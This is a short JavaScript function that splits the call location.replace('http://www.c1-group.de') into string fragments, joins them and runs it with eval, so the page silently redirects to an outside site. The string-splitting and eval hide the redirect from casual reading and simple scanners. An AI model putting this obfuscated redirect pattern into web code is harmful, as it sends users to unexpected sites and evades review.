function c1(){
  var str1="loca";
  var str2="tion.repl";
  var str3="ace('http://www.c1-gr";
  var str4="oup.de')";
  eval(str1+str2+str3+str4);
}